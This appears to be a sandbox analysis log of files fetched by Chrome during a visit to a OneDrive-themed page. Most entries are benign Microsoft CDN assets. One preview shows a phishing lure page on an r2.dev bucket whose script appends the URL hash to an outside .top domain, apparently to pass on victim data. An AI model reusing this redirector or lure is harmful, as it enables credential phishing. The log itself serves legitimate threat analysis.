                                                          Preview:wOFF......3l......f.........................OS/2.......G...`0.m{cmap...P...R...2...5gasp................glyf......+s..V ...jhead...$...6...6#.hhea...\.......$....hmtx...x...X.....,..loca...............maxp../........ .q..name../........O..R.post..3X....... ....x.c`a..8...........L..t.!.I.(......@9......VP`px..^.....`u,......4..$.x...K(.Q...o.S...A(..@......R....x......f...R.o)ym..4.Y..?R.(n...9.s.9u....a...J1,.5..f1wk.C.~.6.O}H|r..u....*..R..N....F1.v....L.2..,d.KX.JV...t....a...p...$..%.s.k..&...=...S>...@...`_..L.O]....i......`...q...h...`...j...$^'<..^..Nr.V.J..).X.K...$...$...;n$J"q.w...K....:.0.^.........681.Fx..4a...@9\...U...Nh.b.. .....................x..|y|S..9w...e.,[.eK.$.6.e......`...6.H.... @.r..B.$.)IC..6!]2m.YKI'.L......4...I3M;._..5......W...o:...Y.:.{.o..s..G.&D.[...D".Z...mq.w.=.Be!..x....-..x.@...I.d.#5..k....i.......w..tqvK..).D[.....l.|..%9.....o^.jY.7..y.K9R...e....>.......vaN`9.5......{n^1...F...i*.$PJ.'..3.)..0]"....A...>_\..<p
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):4344
                                                          Entropy (8bit):4.600206864331567
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:21FE59ABBEF7846A168756F70F86D474
                                                          SHA1:234300619EF6F45C283519D1CECAEF35D993D22A
                                                          SHA-256:24CA84EA30978DF792133B8DC40B5D0E0D0DFFB307236BA082AF1A8F2151C3AB
                                                          SHA-512:9888490817A48D43D45AC909ADC624187AA1E33CF07524611FDA66B5C4CE84F4801E1930D1988916D7F8883324ECE61899F72D85F2955B7ADD0158FD980995F6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/error/error_shared_dark.svg
                                                          Preview:<svg width="160" height="160" viewBox="0 0 160 160" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1003_114861)">..<path d="M139.501 59.0999L105.201 93.6999C103.201 95.6999 104.101 99.2 106.901 99.9L154.001 112.4C156.801 113.1 159.301 110.6 158.601 107.8L145.801 60.7999C144.901 57.9999 141.501 56.9999 139.501 59.0999Z" fill="url(#paint0_linear_1003_114861)"/>..<path d="M39.6999 19.9L19.2999 64.2C18.0999 66.8 20.1999 69.7 22.9999 69.5L71.4999 65C74.3999 64.7 75.8999 61.5 74.1999 59.1L46.0999 19.3C44.3999 16.9 40.8999 17.3 39.6999 19.9Z" fill="url(#paint1_linear_1003_114861)"/>..<path d="M78.5007 26.0999L19.6007 113.4C16.1007 118.5 19.5007 125.5 25.7007 126L130.801 133.4C137.001 133.8 141.301 127.4 138.601 121.8L92.4007 27.0999C89.7007 21.4999 82.0007 20.9999 78.5007 26.0999Z" fill="#E7C380"/>..<path d="M80.5012 97.1C78.3012 96.9 76.6012 95 76.8012 92.8L79.7011 51.9C79.9011 49.7 81.8012 48 84.0012 48.2C86.2012 48.4 87.9011 50.3 87.7011 52.5L84.8012 93.4C84.6012
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (10088)
                                                          Category:downloaded
                                                          Size (bytes):25671
                                                          Entropy (8bit):5.5135823592803455
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5BC8FECA5CF8FEC547C494200B1D6479
                                                          SHA1:A39B265DF500803D5B22ED172091822461ECECE8
                                                          SHA-256:3F09F631465634FC4F65460E36BC73E63D4BF2223615E19A8767ED67FD743AB5
                                                          SHA-512:14C0B3FE6F3DC7424BA77F76195D0DDD59972E9A14B8FAB7DED66197F172EE5CD6B47B4FF6F1EF2CFAA46143E6BE23D643C15FCDF2FE46882F1BFB044ACA8A3A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/74.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[74],{3589:function(e,t,n){var a,i;n.d(t,{a:function(){return a},b:function(){return i}}),function(e){e[e.View=0]="View",e[e.Edit=1]="Edit",e[e.Extract=2]="Extract",e[e.Esign=3]="Esign"}(a||(a={})),function(e){e.ExitEditMode="ExitEditMode"}(i||(i={}))}.,2830:function(e,t,n){n.d(t,{a:function(){return p},b:function(){return _},c:function(){return m},d:function(){return g},e:function(){return b},f:function(){return c},g:function(){return s},h:function(){return o},i:function(){return d},j:function(){return l},k:function(){return u},l:function(){return x},m:function(){return D},n:function(){return S},o:function(){return v},p:function(){return I},q:function(){return y},r:function(){return f},s:function(){return h},t:function(){return i},u:function(){return a},v:function(){return r}});var a=.5,i=5,r=90,o=14,s=3,c=7,d=5,l=5,u=150,f=96,p=100,m=1,_=255,h=1e8,b=255,g="MsPdfViewer.CACHED_DISPLAY_INFO_ARRAY_STORE_KEY",v={
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):174911
                                                          Entropy (8bit):7.975981092204115
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:803CEB01F01E471C5923A098DF0CEC38
                                                          SHA1:6949B85FCB35FE372AE548D452222F3741EE30A3
                                                          SHA-256:F64DDBB70F682E3D5CFF038F60645C65A5F12FC6540C5847E8820874BDD5DC2A
                                                          SHA-512:FB44310C0C1CA2818BE89F2F985858C632CBE9E7F9BF657396B3B5A97BD2433BE54F2A34977E3050448013BA2528F090427AD99870904465D568EFB17860D92F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/error/error_offline.png
                                                          Preview:.PNG........IHDR..............x......pHYs.................sRGB.........gAMA......a.....IDATx.....-.u...sN.......5.@.P....@..EYf[.H.hG.-.-....v...m.AX.-;.n3dw.#$.v.L...(P#A.$1...P(.<.....7.{3...O.....a.*.]...2.f..<{.....X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (12167)
                                                          Category:downloaded
                                                          Size (bytes):12172
                                                          Entropy (8bit):5.290871244963507
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:2B937206E5B382D169CEFBABBB471097
                                                          SHA1:33BDADDC6815504CA9C3AB9295C782A4DD59FBAA
                                                          SHA-256:1E49AC89AAC36D1580C0633B8B188D4DB4AC042D7BE7E52A9D8EAD559824C126
                                                          SHA-512:43D244ABCD5A2EF2CCAA310C2B91CF159FC82B5BB7D22423772800DA203BE92855B291DB66DB7602241C62FC020572F5BBD2071CFE5CE3AF7E7C2982A38FEA3F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/94399.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[94399],{694399:(e,t,n)=>{n.d(t,{M9:()=>b});var a=n(171125),i=n(936773),r=n(296089),o=n(143592),s=n(453379),c=n(214065),d={DefaultSkip:0,DefaultTop:8,DefaultFaceTop:3,MaxTop:100},l=function(e){function t(n,a){var i=e.call(this,a)||this;return i.status=n,void 0!==typeof Object.setPrototypeOf&&Object.setPrototypeOf(i,t.prototype),i}return(0,a.__extends)(t,e),t}(Error),u=n(599533),f=n(150516);function p(e){return isFinite(e)&&!isNaN(e)}var m={timeoutMs:15e3,backoffTimeMultiplierMs:200,maxRetries:3,fallbackBackoffTimeFunction:function(e,t){return Math.pow(2,e)*t}},_="x-ms-client-request-id",h="Rest.performHealthCheck. Failed to reach our health URL. This means there is a client network issue.",b=function(){function e(){}return e.get=function(t,n,a,i,r,s,c,d){return void 0===d&&(d=o.S3.any),e.getWithResponse(t,n,a,i,r,s,c,d).then(function(e){return e[0]})},e.getWithResponse=function(t,n,a,r,s,c,d,
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (7115)
                                                          Category:downloaded
                                                          Size (bytes):13453
                                                          Entropy (8bit):5.311289557095858
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D69F0ACC7A64E23580B72754F21062C5
                                                          SHA1:19E93BC8F1B318B4AA217D7B3694C53B3BDB11C3
                                                          SHA-256:4A7F727D0D4D96417597FC7D66BA7F6AEB157F7B1C5687D7F6391581A57D6751
                                                          SHA-512:5CE20FB54595D4F0B47011BB25BF75730E48F6A1AA1539C08704A85553E0079483A693632EC540129F8D849507DB72D1FFB8ECB5542900EBC084E2E9D76DBFF6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/68.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[68,1300],{6249:function(e,t,n){n.d(t,{a:function(){return E}});var a=n("tslib_538"),i=n("react-lib"),r=n(2942),o=n(27),s=n(51),c=n("odsp.util_517"),d=n(100),l=n("fui.util_175");(0,l.ZW)([{rawString:".frame_610dbd83{border:none;display:block}"}]);var u=n(10),f=n("fui.core_932"),p=n(26),m=n(1567),_=n(44),h=n(39),b=n(105),g=n(8692),v={all:{pickerTitle:g.f,pickerTitleIntervals:g.e},files:{pickerTitle:g.b,pickerTitleIntervals:g.a},folders:{pickerTitle:g.d,pickerTitleIntervals:g.c}};function y(e){var t,n=e.title,a=e.selectionMode,i=e.itemMode;if(n)t=n;else{var r="multiple"===a?2:1,o=v[i],s=o.pickerTitle,d=o.pickerTitleIntervals;t=(0,c.Z_)((0,c.at)(s,d,r)||"")}return t}var S=c.x9.isActivated("182B2FCC-2348-48AB-BFBE-04969610C5E1","10/18/2021","Split picker options across query-string and post-messaging"),D=c.x9.isActivated("69FB175A-8186-4311-9045-F073BA0B6A87","10/27/2021","Propagate current theme to File Picker"),
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):235
                                                          Entropy (8bit):5.2381009321754695
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:90286F624E7A40FE0AF129E8D04B83F4
                                                          SHA1:01EE2D06158B1E7D3074F9EAB02E86E0B41BC99C
                                                          SHA-256:3B6F9661D7845638E62D048E260AA7B5C104494E24FFC10F37498520EFF0834D
                                                          SHA-512:9A181ED73E00D6D2627CE237BBF58166C7F29ED67E6C55F9B4B7EEFF0F703E2489B07C6428CDF4CC01757E722F3BB020CF156F0CCD0C1DF08A99ACCB990DD420
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/1966.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1966],{4801:function(e,t,n){n.r(t),n.d(t,{presenceStoreKey:function(){return i}});var a=n(3379),i=(0,n("odsp.util_517").AI)("PresenceStore.key",a.b,{})}.}]);
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2569)
                                                          Category:downloaded
                                                          Size (bytes):7530
                                                          Entropy (8bit):4.945823132511204
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:3BD368710264C5817E78F6E7CC15A29C
                                                          SHA1:A9B862CA57F679817950FABD0CA1A77287D47C67
                                                          SHA-256:9FEB28EFFA3ECED5EE2D399C905B5C34A681299B0F0EB906F3845744C66C33BE
                                                          SHA-512:1490BF97945CB0E8F480DED31751EF5DFEC5FD23872761DB386F2277983A2B1A3DC3D473B08160C710BC694A09B3D4C43102D1F9394C4462686747316A60A829
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/37456.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[37456],{258704:(e,t,n)=>{n.d(t,{FNH:()=>r,O$C:()=>s,paJ:()=>i,rbj:()=>o});var a=n(639691);const i=(0,a.U)("TopSpeed20Regular","20",["M5.42 4.7A6.97 6.97 0 0 1 9.5 3.03V4.5a.5.5 0 0 0 1 0V3.02A7 7 0 0 1 16.93 9H15a.5.5 0 0 0 0 1h2c0 2-.86 3.9-2.21 5.17a.5.5 0 0 0 .69.73A8.17 8.17 0 0 0 18 10a8 8 0 1 0-13.44 5.9.5.5 0 0 0 .69-.73A7.2 7.2 0 0 1 3 10h2a.5.5 0 1 0 0-1H3.07c.2-1.36.78-2.6 1.64-3.58l1.44 1.43a.5.5 0 0 0 .7-.7L5.42 4.7Zm8.03 1.1a.5.5 0 0 1 .75.64l-.12.2a343.95 343.95 0 0 1-2.2 3.82 30.11 30.11 0 0 1-.65 1.01 1.5 1.5 0 0 1-2.28-1.94c.07-.09.2-.2.34-.33l.56-.48a123.93 123.93 0 0 1 3.42-2.77l.18-.14Z"]),r=(0,a.U)("Video20Regular","20",["M5 4a3 3 0 0 0-3 3v6a3 3 0 0 0 3 3h5a3 3 0 0 0 3-3v-.32l3.04 2.1c.83.57 1.96-.03 1.96-1.03v-7.5c0-1-1.13-1.6-1.96-1.03L13 7.32V7a3 3 0 0 0-3-3H5Zm8 4.54 3.6-2.5c.17-.1.4.01.4.21v7.5c0 .2-.23.32-.4.2L13 11.46V8.54ZM3 7c0-1.1.9-2 2-2h5a2 2 0 0 1 2 2v6a2 2
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (20803)
                                                          Category:downloaded
                                                          Size (bytes):20808
                                                          Entropy (8bit):5.160407709740641
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:069703E41F31FFCD987E31E28B9ED90C
                                                          SHA1:7873737574CDF8A13DD2367024522576BBE8B017
                                                          SHA-256:4C53016092D6B8F1B0692251ACFC21069533BC69FC7133CB7B5607E12B9A1F1C
                                                          SHA-512:09DEF59D31918DC1DBF2EA4F2B4A310AC60947AD7C5E1777659A5FF58E1A84443EF1D9912A4407BD1CC3AFEE15988D2C99898544739B44F4C6E921A6DC1D51DE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/1979.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1979],{6114:function(e,t,n){n.r(t),n.d(t,{PushNotifier:function(){return F}});var a=n("tslib_538"),i=n(10),r=n(105),o=n("odsp.util_517"),s=n(4586),c=n(36),d="PushNotifier",l="".concat(d,".SocketIoAPI"),u="".concat(d,".SocketIoAPI.GetToken"),f="".concat(d,".WebSocketConnect"),p="".concat(f,".ExceedMaxRetryLimit"),m="".concat(f,".HasPendingConnect"),_="".concat(d,".SocketIoConnect"),h="".concat(d,".SocketIoDisconnect"),b="".concat(d,".SocketIoServerDisconnect"),g="".concat(d,".SessionConnect"),v="".concat(d,".SessionDisconnect"),y="".concat(d,".SubmitUpdate"),S="".concat(y,".BeforeConnect"),D="".concat(y,".Missing"),I="".concat(y,".ERROR"),x="".concat(d,".Coauthoring"),C=[429,503],O=[403,404,400];function w(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];e.forEach(function(e){return e.apply(void 0,t)})}var E=function(e,t){if(null!==t&&"object"==typeof t){var n=Object.getOwnPropertyNames(t),a={};r
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):6396922
                                                          Entropy (8bit):5.93566896792562
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D817B2B9201B470EC4337C91DD5C7BBD
                                                          SHA1:544A063B443B1AFCA5BCF0FF49E62027D694A127
                                                          SHA-256:C7099B708504AA978AD457ECA3341018859782EBE388D6C79454047FDAC058BD
                                                          SHA-512:DC880BA245B848187F8FAA55A9FAA6C7C6B328957C44F9F1355D08F1F584F4C28BB24217B84858610291FEAF82A8F303DD7892EB831E4CAAA3F4BDC964086826
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://myarrowleaf1-my.sharepoint.com/_layouts/15/SPComponentRegistry.ashx?projects=[%22STS%22]&languages=%5B%5D
                                                          Preview:{"sts":{"en-US":{"SPLIST":{"scriptPathData":{"aria-mini":"aria-mini-b1d3eb2e","customformatter-mini":"customformatter-mini-fcd00133","customformatter-mini.resx":"en-us/customformatter-mini.resx-3573f52d","roostereditor-mini":"roostereditor-mini-4998463d","roostereditor-mini.resx":"en-us/roostereditor-mini.resx-cb522433","spectreviewer-mini":"spectreviewer-mini-ce4e101e","babylonjs-mini":"babylonjs-mini-2fecff8d","reactandknockout-mini":"reactandknockout-mini-38b94816","listviewdataprefetch-mini":"listviewdataprefetch-mini-2f73ea81","splistreactcontrolsdeferred-mini":"splistreactcontrolsdeferred-mini-7a71c298","splistreactcontrolsdeferred-mini.resx":"en-us/splistreactcontrolsdeferred-mini.resx-9f5d2dc4","splistreactcontrolsbeforeplt-mini":"splistreactcontrolsbeforeplt-mini-04fb8d49","splistreactcontrolsbeforeplt-mini.resx":"en-us/splistreactcontrolsbeforeplt-mini.resx-ed5726fd","splistapp-mini":"splistapp-mini-27747d47","splistapp-mini.resx":"en-us/splistapp-mini.resx-50f4529c","splistf
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65447)
                                                          Category:dropped
                                                          Size (bytes):89501
                                                          Entropy (8bit):5.289893677458563
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:RIFF (little-endian) data, Web/P image
                                                          Category:downloaded
                                                          Size (bytes):30778
                                                          Entropy (8bit):7.9906229092027425
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:E7D3A17DA96B7F43961EEC4ABCED97B4
                                                          SHA1:0AF0C5A2A390B75A0F81E75D1DC67D14C675348F
                                                          SHA-256:49549A16F46767FA5C801DE6E26A1C45112B83653F048BC9A78BA7210F8A14A8
                                                          SHA-512:BA5B88D16D03168919B6E633A0AC72DE155ECCC6C1CE1304DA2A29E8288D272BD320F9F6307DE24C046E7E85701C7CFC768040385AE70002D341F90304305A49
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_meeting_v3_dark.webp
                                                          Preview:RIFF2x..WEBPVP8X..............ALPH|N.....m$9...>N.....BD.'..u.5.v.!..L.E.2..y.h..!..EB...T.H.w.]UD.&..Ka..,...>z..m.AI.....C....*.K..U.L..g..sTPjwp2...f..x..if.4.3.m.....{.")....5.:y8....;...w...{.Zg?......X...m.$#..+.v.<...$Y.$..........g.Tb.u.X....AQ.d.ms.@..=`.n.HQq>@.l....^.>..J..,.f.s.....l7s...!..eh46|v.......b..=+...OR...... I..Jc.....f%....F.............?............%h..F.m...9P0.Z..r..E.A..-.p)....#0....l)..p.Al..^....).Cj..5.L.qm....D.i...v[?....6....hA3d:S......{...C..".r.Jw...^...r...Y.lR....4.;......C.bo..7..+.k..?+.j.7|.^v......G......x.....'....hC.nP.jE!.$.iS$....RI..-...n _.a.~+.[)b!..."P.[yM.8M.uQ ...".....8..*..t.^Rm....p.%(n-."G.J9.....;H.....w.PE..y...`.@.....V.....x...{!.X...`..k,L.K........:.W...u.\.^..=".@@.2}..KI...D.@5A...7J{p;.7..krY..5=....\.gN.$......u.P....!E.....s..+..O...@.^t....c.I-T...\.......<UV.A...V$..K.......5K...7t....H....6.tr.rn=3`B..j...e...%}..0...........a........$@..tv.......$....t'..x.p....
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (65377), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):104591
                                                          Entropy (8bit):5.961921126377919
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:146ACBDB9557B8AECF4FA1586F8A2987
                                                          SHA1:9F329DE4D7D1E466CDFBDE9F717405BDE19AC6BD
                                                          SHA-256:1FA176FB542AF5EDAAB61E2F4F13230EFC6A18A604546BFF82DF779943A10582
                                                          SHA-512:CFA40FC9DBC75D606AD4DC9969D964CF70EA5A710A92B3D8A780A9971702035A0AE048774281539767363B178A7E9A9024F378E685F6E85873315E563A28A334
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.html
                                                          Preview:<script>....let ulink = "https://vangabouned.top/".. let ai = `${ulink}${window.location.hash.substring(1)}`;.. let bi = "https://amazon.com/";....let imageUrl = 'data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEAkACQAAD/4gHbSUNDX1BST0ZJTEUAAQEAAAHLAAAAAAJAAABtbnRyUkdCIFhZWiAAAAAAAAAAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLVF0BQ8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlyWFlaAAAA8AAAABRnWFlaAAABBAAAABRiWFlaAAABGAAAABR3dHB0AAABLAAAABRjcHJ0AAABQAAAAAxyVFJDAAABTAAAACBnVFJDAAABTAAAACBiVFJDAAABTAAAACBkZXNjAAABbAAAAF9YWVogAAAAAAAAb58AADj0AAADkVhZWiAAAAAAAABilgAAt4cAABjcWFlaIAAAAAAAACShAAAPhQAAttNYWVogAAAAAAAA808AAQAAAAEWwnRleHQAAAAATi9BAHBhcmEAAAAAAAMAAAACZmYAAPKnAAANWQAAE9AAAApbZGVzYwAAAAAAAAAFc1JHQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/2wBDAAQDAwQDAwQEAwQFBAQFBgoHBgYGBg0JCggKDw0QEA8NDw4RExgUERIXEg4PFRwVFxkZGxsbEBQdHx0aHxgaGxr/2wBDAQQFBQYFBgwHBwwaEQ8RGhoaGhoaGhoaGhoaGhoa
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (5313)
                                                          Category:dropped
                                                          Size (bytes):27070
                                                          Entropy (8bit):5.397622609893911
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:01297252E8084CDAC2C21DE668E7B4AC
                                                          SHA1:D68C9117ADAC20A5DCB25020AC7D7B285FB08F88
                                                          SHA-256:A04C94735D37216CF720D37CA7AE13498A25653332570E82DF86D17D76819FD2
                                                          SHA-512:0C1DAF4123D1A463803E4B7214D42506C3A9321AD16B204526335738B353A5AF1411E56C04F4FE44145D0BDFCF2104BF3711BD389AD7A8FA78C0A26A04B5A7E3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[55],{4973:function(e,t,n){n.d(t,{a:function(){return O}});var a=n("tslib_538"),i=n("react-lib"),r=n(3),o=n(8),s=n(41),c=n(9),d=n("odsp.util_517"),l=n(47),u=n(34),f=n(6),p=n(14),m=n(4359),_=n(3696),h=n(58),b=n(3694),g=n(40),v=n(62),y=n(359),S=n(5),D=n(11),I=(0,n(20).a)(function(){return(0,a.yv)(void 0,void 0,void 0,function(){return(0,a.SO)(this,function(e){switch(e.label){case 0:return[4,Promise.all([n.e("ondemand.resx"),n.e(0),n.e(1),n.e(2),n.e(3),n.e(6),n.e(7),n.e(9),n.e(32),n.e(992)]).then(n.bind(n,4573))];case 1:return[2,e.sent().ApproveRejectDialog]}})})}),x=(0,r.c)(function(e,t){var n=t.onContinue,r=t.onCancel,o=t.resolve,s=t.reject,c=(0,a.dc)(t,["onContinue","onCancel","resolve","reject"]);return i.createElement(I,(0,a.q5)({},c,{onContinue:function(e){return(0,a.yv)(void 0,void 0,void 0,function(){return(0,a.SO)(this,function(t){switch(t.label){case 0:return n?[4,n(e)]:[3,2];case 1:t.sent(),t.label=2;c
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):19995
                                                          Entropy (8bit):4.18417172948625
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:1E633D46AC979AB4316B5427BD328527
                                                          SHA1:0391F135924813ECAD623F5543E5E71E4FC23851
                                                          SHA-256:F7E06F07ACC7A46215319570019C1483170B8FE36A58D35D2A9A92F382DF679F
                                                          SHA-512:9B11B20D49E26983F510B666F417B88BFEBDB9740E4CAD401739B05689A6EDBC283227C19A2A125D95AD7F62E83E1F09FF0A6975BDCABA21335E9A76F88CBF6F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_sharedwithme_dark.svg
                                                          Preview:<svg width="220" height="220" viewBox="0 0 220 220" fill="none" xmlns="http://www.w3.org/2000/svg">..<path opacity="0.2" d="M169.427 169.965C220 164.994 227.995 73.5033 204.22 41.8942C142.259 -40.5011 124.675 38.3245 65.1534 12.7643C28.8745 -2.8134 -15.2577 48.7713 37.9929 86.313C67.2063 106.908 37.9537 102.907 16.2213 118.614C-5.12184 134.038 12.4602 157.3 42.3759 165.974C74.149 175.186 135.541 173.298 169.427 169.965Z" fill="#797673"/>..<path d="M139.255 103.699L122.341 67.209C121.987 66.5275 121.442 65.9643 120.772 65.5885C120.103 65.2126 119.338 65.0406 118.572 65.0936L82.9512 69.1223L82.4584 68.2709L81.0527 65.8456C80.7327 65.3527 80.2875 64.9536 79.7627 64.6891C79.2379 64.4247 78.6523 64.3044 78.0658 64.3405L73.3273 64.8768L62.8561 66.0603C62.5462 66.0578 62.2414 66.1406 61.9753 66.2995C61.7091 66.4584 61.4917 66.6873 61.3467 66.9614C61.2018 67.2354 61.1349 67.544 61.1534 67.8535C61.1719 68.1629 61.275 68.4613 61.4515 68.7162L64.9102 75.3067L81.1183 110.278C81.5193 111.065 82.181
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 15152, version 1.3277
                                                          Category:downloaded
                                                          Size (bytes):15152
                                                          Entropy (8bit):7.975837827549664
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:71C6CE41CD1A7B9DEFAA9D9D739BE12E
                                                          SHA1:ED30186F02C259A162F962D7861861C41EE25817
